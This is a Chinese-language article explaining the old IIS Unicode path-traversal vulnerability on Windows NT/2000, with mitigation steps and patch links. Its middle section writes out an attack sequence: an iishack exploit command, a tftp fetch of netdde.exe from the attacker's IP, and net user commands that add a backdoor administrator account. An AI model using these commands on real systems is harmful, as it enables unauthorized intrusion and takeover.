Unicode漏洞是一个专门攻击IIS的漏洞，Unicode漏洞是最容易让入侵者得手的一个漏洞，可以不费吹灰之力改掉默认主页，重则删除硬盘上的数据，高手甚至可以轻松获取Administrator权限!

由于Windows NT/2000操作系统的普及率比较高，所以很容易使它成为很多黑客攻击的目标。目前，Windows NT/2000最主要的Unicode漏洞一共有四种，分别针对不同语言的操作系统。分别为：%c1%1c、%c0%cf、%c1%pc、%c0%9v。例如第一个 %c1%1c 的问题。c1 1c，中文简体里面没有这个字，按照正常的情况，根据内码转换文件\winnt\system32\c_936.nls会编码成“？”。但对简体中文版IIS中 c1 1c解码成了（c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路径串中的“\”之后，所以可以突破IIS路径访问到上级目录。

被攻击迹象

黑客一般都采用IIS HACK攻击法进行攻击，但是需要工具“Iishack”(注：Iishack.exe是攻击NT 4.0的，Iishack1.exe是攻击NT 5.0的） Netcat和TFTP还有Netdde。

一般入侵者的攻击手法是这样的：
首先，将TFTP装到机器里面，将自己的机器变成一个FTP服务器。然后，搜索到NT机器的IP地址来进行攻击，例如：192.168.0.10。

“c:\iishack 192.168.0.10 80 99 ”

如果显示攻击成功的话，黑客就可以再输入：

“c:\telnet 192.168.0.10 99 ”

可以进入到“c:\winnt\system32\”里面，然后入侵者会运行“c:\winnt\system32\tftp -i <自己的IP地址> get netdde.exe ”然后再运行Netdde.exe文件，建立一个账号，将它的权限提升到Administrators组：

“c:\winnt\system32\netdde.exe net user make love /add ”

“c:\winnt\system32\netdde.exe net localgroup administrators make /add”

然后退出来，用“net use \\192.168.0.10\ipc$ love /user:make”建立IPC连接以进行非法入侵。

被攻击的机器，入侵者可以利用漏洞修改主页；删除硬盘上的东西；建立代理服务器，危害非常大。

解决方法

1. 限制网络用户访问和调用“CMD”命令的权限；若没必要使用“Scripts”和“Msadc”目录，删除或改名；安装Windows NT系统时不要使用默认“WINNT”路径，您可以改为其他的文件夹，如“C:\mywindowsnt”。

2. 用户可从如下地址Microsoft提供的补丁：
IIS 4.0的补丁地址：http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

IIS 5.0补丁地址：http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp